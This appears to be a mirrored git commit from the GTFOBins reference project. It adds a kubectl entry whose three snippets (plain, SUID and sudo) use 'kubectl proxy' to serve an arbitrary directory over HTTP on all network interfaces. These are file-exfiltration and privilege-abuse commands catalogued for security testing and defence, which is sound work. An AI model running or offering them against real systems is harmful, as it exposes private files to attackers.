mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Adding kubectl file-upload
Also see https://www.lacework.com/blog/kubernetes-tools-are-helpful-for-your-team-and-your-attacker/ Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
2de683d35e
commit
89e2aa180e
16
_gtfobins/kubectl.md
Normal file
16
_gtfobins/kubectl.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
description: It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.
|
||||
functions:
|
||||
file-upload:
|
||||
- code: |
|
||||
LFILE=dir_to_serve
|
||||
kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=dir_to_serve
|
||||
./kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=dir_to_serve
|
||||
sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
|
||||
---
|
Loading…
Reference in New Issue
Block a user